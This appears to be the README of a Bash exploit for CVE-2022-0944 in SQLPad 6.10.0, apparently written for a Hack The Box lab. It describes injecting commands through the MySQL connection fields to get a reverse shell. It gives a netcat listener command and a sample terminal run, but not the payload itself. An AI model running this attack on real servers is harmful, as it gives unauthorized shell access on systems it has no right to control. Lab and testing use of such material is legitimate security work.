This Bash script exploits an RCE vulnerability in SQLPad 6.10.0, allowing an attacker to achieve remote code execution (RCE) by abusing the host and database fields in SQLPad’s MySQL database connection settings. The exploit leverages SQLPad’s unsanitized handling of the child_process module in Node.js to execute arbitrary commands, ultimately opening a reverse shell on the attacker's machine.
- Netcat Listener: Ensure you have a listener active on your machine with
nc -lvnp 9001. - Target Server Access: This exploit assumes you can communicate with the vulnerable SQLPad instance.
- Clone the Repository (or copy the script locally).
- Run the Script:
┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.- Follow the script prompts to input the target host and your IP address, then wait for a reverse shell connection.
- CVE: CVE-2022-0944
- Affected Version: SQLPad 6.10.0
- Vulnerability: Remote Code Execution (RCE) via template injection
- Impact: This exploit allows an attacker to execute commands on the target server with the privileges of the SQLPad process.
This code is for educational purposes only. Unauthorized access to computer systems is illegal. Only use this exploit with permission.